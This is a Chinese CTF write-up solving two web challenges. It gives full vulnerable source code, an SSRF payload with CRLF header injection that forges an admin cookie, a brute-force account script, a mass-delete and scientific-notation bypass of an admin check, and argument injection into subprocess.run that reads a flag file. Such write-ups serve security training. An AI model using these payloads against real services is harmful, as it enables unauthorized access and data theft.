车联网安全锦标赛

这次比赛发现一个问题,自己之前的writeup写的不详细看不懂了,所以以后writeup都会写的更加详细

WEB

Image-service

访问www.zip即可拿到源码

index.php:

<!DOCTYPE html>
<style>
    img {
        width: 100%;
        height: 100%;
        object-flit: cover;
    }
</style>
<html>
<head>
    <title>Image Service</title>
</head>
<body>
<?php
function downloadImage($quote) {
    $ch = curl_init($quote->url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  //returntransfer
    curl_setopt($ch, CURLOPT_HTTPHEADER, [  // http
        "Accept: */*",
        "Accept-Encoding: gzip",
        "X-From-Author: ".$quote->author   //  admin\"\r\nSet-Cookie: admin=dHJ1ZQ==
    ]);
    $image = curl_exec($ch);
    curl_close($ch);
    $encodeImage = base64_encode($image);
    return "data:image/png;base64,{$encodeImage}";
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $json = json_decode(file_get_contents('php://input'));
    if (strtolower(substr($json->url, 0, 7)) != 'http://' && strtolower(substr($json->url, 0, 8)) != 'https://') {
        http_response_code(400);
        echo 'url must start with http or https';
        exit(1);
    }
    $image = downloadImage($json);
    echo "<h2>Here is a random image for you:</h2>";
    echo "<img src='{$image}' />";
}

if ($_SERVER['REQUEST_METHOD'] == 'GET') {
    $img_list = ["ex9gwo", "jxyopy", "l83o92"];
    $img = $img_list[rand(0, 2)];
    $tmp = '{"url": "http://localhost/static/wallhaven-'.$img.'.png","author": "admin"}';
    $image = downloadImage (json_decode($tmp));
    echo "<h2>Here is a random image for you:</h2>";
    echo "<img src='{$image}' />";
}
?>
</body>
</html>

secret.php:

<?php
function isInternal() {
    return $_SERVER['REMOTE_ADDR'] == '127.0.0.1';
}

$admin = base64_decode($_COOKIE['admin']);

if (isInternal()) {
    if ($admin == 'true') {
        echo "Hello admin, here is your flag: " . getenv('FLAG');
    } else {
        echo "Hello guest, you are not admin";
    }
} else {
    echo "You are not internal";
}

这题一看downlaodImage函数可以进行ssrf

但是限制了http/https协议,看了下没有想到办法绕过

    if (strtolower(substr($json->url, 0, 7)) != 'http://' && strtolower(substr($json->url, 0, 8)) != 'https://') {
        http_response_code(400);
        echo 'url must start with http or https';
        exit(1);
    }

然后尝试进行了探测,没有什么东西,看了看secret.php,尝试访问被限制了,只能127.0.0.1才能访问(网上绕过$_SERVER['REMOTE_ADDR'] == '127.0.0.1'的方法基本都是ssrf

function isInternal() {
    return $_SERVER['REMOTE_ADDR'] == '127.0.0.1';
}

于是进行ssrf访问

{"url":"http://127.0.0.1/secret.php"}

1.发现还需要携带Cookie值,并且admin=true,并且true需要base64加密

2.继续分析downlaodImage函数,尝试http协议加crlf注入%0a%0d并不行,也不能远程读文件就行重定向操作

(如果有curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);这个就可以远程读取文件实现重定向到gopher协议或者dict协议

0xGame里面有道题目是这样的)

3.发现有.$quote->author可以进行字符串拼接,想到了字符串拼接实现逃逸Cookie的值

    curl_setopt($ch, CURLOPT_HTTPHEADER, [ 
        "Accept: */*",
        "Accept-Encoding: gzip",
        "X-From-Author: ".$quote->author   
    ]);

最终payload:

{
    "url": "http://127.0.0.1/secret.php",
    "author": "admin\"\r\nCookie: admin=dHJ1ZQ=="
}

login

这题是原题(https://ctftime.org/writeup/37931

跟着原题WriteUp分析一波

app.py:

from flask import Flask, request, make_response, render_template, redirect, url_for
import json
from uuid import uuid4 as uuid
from Userdb import UserDB
import subprocess

app = Flask(__name__,
            static_url_path='/static',
            static_folder='static',)

userdb = UserDB("userdb.json")
userdb.add_user("admin@login.com", 9_001_0001, str(uuid()))


def delete_accs(emails):
    for email in emails:
        userdb.delete_user(email)
    return True


def error_msg(msg):
    resp = {
        "return": "Error",
        "message": msg
    }
    return json.dumps(resp)


def success_msg(msg):
    resp = {
        "return": "Success",
        "message": msg
    }
    return json.dumps(resp)


def get_user(request):
    auth = request.cookies.get("auth")
    if auth is not None:
        return userdb.authenticate_user(auth)
    return None


def validate_command(string):
    return len(string) == 4 and string.index("date") == 0


def api_create_account(data, user):
    dt = data["data"]
    email = dt["email"]   #
    password = dt["password"]
    groupid = dt["groupid"]
    userid = dt["userid"]

    if email == "admin@login.com":
        return error_msg("cant create admin")  #

    assert (len(groupid) == 3)
    assert (len(userid) == 4)

    userid = json.loads("1" + groupid + userid)

    if userdb.add_user(email, userid, password):
        return success_msg("User Created")
    else:
        return error_msg("User creation failed")


def api_delete_account(data, user):
    if user is None:
        return error_msg("not logged in")

    if data["data"]["email"] != user["email"]:
        return error_msg("Hey thats not your email!")

    if delete_accs(data["data"].values()):
        return success_msg("deleted account")


def api_edit_account(data, user):
    if user is None:
        return error_msg("not logged in")

    new = data["data"]["email"]

    if userdb.change_user_mail(user["email"], new):
        return success_msg("Success")
    else:
        return error_msg("Fail")


def api_login(data, user):
    if user is not None:
        return error_msg("already logged in")

    c = userdb.login_user(data["data"]["email"], data["data"]["password"])
    if c is None:
        return error_msg("Wrong User or Password")
    resp = make_response(success_msg("logged in"))
    resp.set_cookie("auth", c)
    return resp


def api_logout(data, user):
    if user is None:
        return error_msg("Already Logged Out")

    userdb[user["email"]]["cookie"] = ""
    userdb.save_db()

    return True


def api_error(data, user):
    return error_msg("General Error")


def api_admin(data, user):
    if user is None:
        return error_msg("Not logged in")
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return error_msg("User is not Admin")

    cmd = data["data"]["cmd"]
    if validate_command(cmd):
        out = subprocess.run(cmd, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)    # cmd
        return success_msg(out.stdout.decode())

    return error_msg("invalid command")


actions = {
    "delete_account": api_delete_account,
    "create_account": api_create_account,
    "edit_account": api_edit_account,
    "login": api_login,
    "logout": api_logout,
    "error": api_error,
    "admin": api_admin,
}


@app.route("/json_api", methods=["GET", "POST"])
def json_api():
    user = get_user(request)
    if request.method == "POST":
        data = json.loads(request.get_data().decode())
        action = data.get("action")
        if action is None:
            return "missing action"

        return actions.get(action, api_error)(data, user)

    else:
        return json.dumps(user)


@app.route("/")
def home():
    user = get_user(request)
    if user is not None:
        return redirect(url_for("user"))
    return render_template('home.html', title="Home", user=None)


@app.route("/login")
def login():
    user = get_user(request)
    if user is not None:
        return redirect(url_for("user"))
    return render_template('login.html', title="Login", user=None)


@app.route("/signup")
def signup():
    user = get_user(request)
    if user is not None:
        return redirect(url_for("user"))
    return render_template('signup.html', title="Signup", user=None)


@app.route("/admin")
def admin():
    user = get_user(request)
    if user is None:
        return redirect(url_for("login"))
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return redirect(url_for("user"))
    return render_template('admin.html', title="Admin", user=user)


@app.route("/user")
def user():
    user = get_user(request)
    if user is None:
        return redirect(url_for("login"))
    is_admin = userdb.is_admin(user["email"])
    return render_template('user.html', title="User Page", user=user, is_admin=is_admin)


@app.route("/usersettings")
def settings():
    user = get_user(request)
    if user is None:
        return redirect(url_for("login"))
    return render_template('usersettings.html', title="User Settings", user=user)


app.run(host='0.0.0.0', port=5000, debug=False)

Userdb.py:

import json
from uuid import uuid4 as uuid
import hashlib


class UserDB:
    def __init__(self, filename):
        self.db_file = filename

        with open(self.db_file, "r+") as f:
            if len(f.read()) == 0:
                f.write("{}")

        self.db = self.get_data()

    def get_data(self):
        with open(self.db_file, "r") as f:
            return json.loads(f.read())

    def save_db(self):
        with open(self.db_file, "w") as f:
            f.write(json.dumps(self.db))
        self.db = self.get_data()

    def login_user(self, email, password):
        user = self.db.get(email)
        if user is None:
            return None

        if user["password"] == hashlib.sha256(password.encode()).hexdigest():
            self.db[email]["cookie"] = str(uuid())
            self.save_db()
            return self.db[email]["cookie"]

        return None

    def authenticate_user(self, cookie):
        for k in self.db:
            dbcookie = self.db[k]["cookie"]
            if dbcookie != "" and cookie == dbcookie:
                return self.db[k]

        return None

    def is_admin(self, email):
        user = self.db.get(email)
        if user is None:
            return False
        return user["email"] == "admin@login.com" and user["userid"] > 90000000   #

    def add_user(self, email, userid, password):
        user = {
            "email": email,
            "userid": userid,
            "password": hashlib.sha256(password.encode()).hexdigest(),
            "cookie": ""
        }

        if self.db.get(email) is None:
            for k in self.db:
                if self.db[k]["userid"] == userid:
                    return False
        else:
            return False

        self.db[email] = user
        self.save_db()

        return True

    def delete_user(self, email):
        if self.db.get(email) is None:
            print("user doesnt exist")
            return False
        del self.db[email]
        self.save_db()
        return True

    def change_user_mail(self, old, new):
        user = self.db.get(old)
        if user is None:
            return False
        if self.db.get(new) is not None:
            print("account exists")
            return False

        user["email"] = new
        del self.db[old]
        self.db[new] = user
        self.save_db()
        return True

这题逻辑很长,一步一步的来

首先我们分析到api_admin这里

def api_admin(data, user):
    if user is None:
        return error_msg("Not logged in")
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return error_msg("User is not Admin")

    cmd = data["data"]["cmd"]
    if validate_command(cmd):
        out = subprocess.run(cmd, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)    # cmd
        return success_msg(out.stdout.decode())

    return error_msg("invalid command")

这里的subprocess.run函数应该可以执行shell,但是看到validate又对cmd进行了限制,不管了 我们先进行admin身份伪造

看到路由很多,常规注册admin绕过或者sql注入这些思路不太行,我们先注册一个普通的账户身份(这里和原题有点不一样,这里没有验证码的验证) 我们还是说一下原题在这里的思路吧!!因为原题睡眠了20秒,防止我们爆破这4位密码,我们这里用Superpermutation来匹配验证码,贴一手原题脚本(不懂Superpermutation https://en.wikipedia.org/wiki/Superpermutation

import requests
import random
import threading

base_url = 'https://5ae393509ccec98005d31b00-1024-cybercrime-society-club-germany.challenge.master.camp.allesctf.net:31337'
userid = '8476'
groupid = '001'
email = f'8476@abcde.com'


def make_account(email, password, groupid, userid):
    # create a long activation code
    activation = '1234567890135791246801470258136959384950162738'
    activation += str(reversed(activation))

    url = f'{base_url}/json_api'

    response = requests.post(url, json={
        'action': 'create_account',
        'data': {
            'email': email,
            'password': password,
            'groupid': groupid,
            'userid': userid,
            'activation': activation
        }
    })

    # return None if and only if the account wasn't created
    result = response.json()
    if 'return' in result:
        if result['return'] == 'Error':
            if 'message' in result and result['message'] != "Activation Code Wrong":
                print('\nUnexpected error in response:', response.text)
            return None
        else:
            return result
    return None

print(f'Making account with userid {userid} and email {email}')
found = False

def attempt():
    # try to create an account 10 times
    # (each try takes 20 seconds)
    global found
    for try_number in range(10):
        if found:
            return
        result = make_account(email, '1234', groupid, str(userid))
        if result is not None:
            found = True
            print('*', end='', flush=True)
        else:    
            print(try_number, end='', flush=True)

# run one attempt in each 20 threads
num_threads = 20
threads = []

for num_thread in range(num_threads):
    thread = threading.Thread(target=attempt)
    thread.start()
    threads.append(thread)

for thread in threads:
    thread.join()


if found:
    print('\nSuccess!')
else:
    print('\nFailure')

我们这里的题目直接注册就可以了

然后我们发现注册了,登陆进来,发现除了logout,还有edit_account和delete_account路由可以用

发现delete这里只检测了email是否和当前用户一样,并且是循环遍历删除,我们把admin删掉,自己注册一个,我们这里用一个小小的trick就绕过了

def api_delete_account(data, user):
    if user is None:
        return error_msg("not logged in")

    if data["data"]["email"] != user["email"]:
        return error_msg("Hey thats not your email!")

    if delete_accs(data["data"].values()):
        return success_msg("deleted account")
def delete_accs(emails):
    for email in emails:
        userdb.delete_user(email)
    return True

Userdb.py:

def delete_user(self, email):
    if self.db.get(email) is None:
        print("user doesnt exist")
        return False
    del self.db[email]
    self.save_db()
    return True

绕过payload:

这里的"email":"8476@abcde.com"是我们自己注册的普通用户邮箱,第二个是admin的注册邮箱

{"action":"delete_account","data":{"email":"8476@abcde.com", "other_email": "admin@cscg.de"}}

这里的userid需要大于90000000才可以认证admin

Userdb.py:

def is_admin(self, email):
    user = self.db.get(email)
    if user is None:
        return False

    #TODO check userid type etc
    return user["email"] == "admin@cscg.de" and user["userid"] > 90000000
def api_create_account(data, user):
    # [...]

    groupid = dt["groupid"]
    userid=dt["userid"]
    
    # [...]

    assert(len(groupid) == 3)
    assert(len(userid) == 4)

    userid = json.loads("1" + groupid + userid)

    # [...]

    if userdb.add_user(email, userid, password):
        # [...]

但是无论我们怎么拼接数字大小都不够,我们想到了科学计数法进行绕过

userid = json.loads("1" + groupid + userid)

>>> json.loads('1'+'000'+'0000') > 90_000_000
False

>>> json.loads('1'+'e10'+'    ') > 90_000_000
True

然后我们就来到了最好一步了,实现读取flag

def api_admin(data, user):
    if user is None:
        return error_msg("Not logged in")
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return error_msg("User is not Admin")

    cmd = data["data"]["cmd"]
    # currently only "date" is supported
    if validate_command(cmd):
        out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        return success_msg(out.stdout.decode())


    return error_msg("invalid command")

这里限制了data["data"]["cmd"]要进行传递四个值和必须传递第一个值为date,肯定不是直接命令执行这么简单

def validate_command(string):
    return len(string) == 4 and string.index("date") == 0

这种方式subprocess.run(args)是有效的,如果args是一个列表,第一个元素将是执行的命令,其余的元素将用作它的命令行参数。我们仍然无法获取flag。我需要阅读该date命令,看看是否可以找到任何要传递的参数来显示该标志,然后我找到了解决方案。首先,我们可以date使用**-f filename**. 但这只用了 3 个元素。我需要一个不需要任何参数的标志,并找到了-u.

$ date --help
Usage: date [OPTION]... [+FORMAT]
  or:  date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
Display date and time in the given FORMAT.
With -s, or with [MMDDhhmm[[CC]YY][.ss]], set the date and time.

Mandatory arguments to long options are mandatory for short options too.
  -d, --date=STRING          display time described by STRING, not 'now'
      --debug                annotate the parsed date,
                              and warn about questionable usage to stderr
  -f, --file=DATEFILE        like --date; once for each line of DATEFILE
  -I[FMT], --iso-8601[=FMT]  output date/time in ISO 8601 format.
                               FMT='date' for date only (the default),
                               'hours', 'minutes', 'seconds', or 'ns'
                               for date and time to the indicated precision.
                               Example: 2006-08-14T02:34:56-06:00
  --resolution               output the available resolution of timestamps
                               Example: 0.000000001
  -R, --rfc-email            output date and time in RFC 5322 format.
                               Example: Mon, 14 Aug 2006 02:34:56 -0600
      --rfc-3339=FMT         output date/time in RFC 3339 format.
                               FMT='date', 'seconds', or 'ns'
                               for date and time to the indicated precision.
                               Example: 2006-08-14 02:34:56-06:00
  -r, --reference=FILE       display the last modification time of FILE
  -s, --set=STRING           set time described by STRING
  -u, --utc, --universal     print or set Coordinated Universal Time (UTC)
      --help        display this help and exit
      --version     output version information and exit

最后的过程是这样的

{"action":"admin","data":{"cmd":"date"}}
{"action":"admin","data":{"cmd":["date", "-f", "flag.txt", "-u"]}}

最后拿到flag

评价-如果是原创题目确实挺牛的,很长的逻辑链条,每个逻辑都不难,但是都审计出来,绕过还是需要很多trick的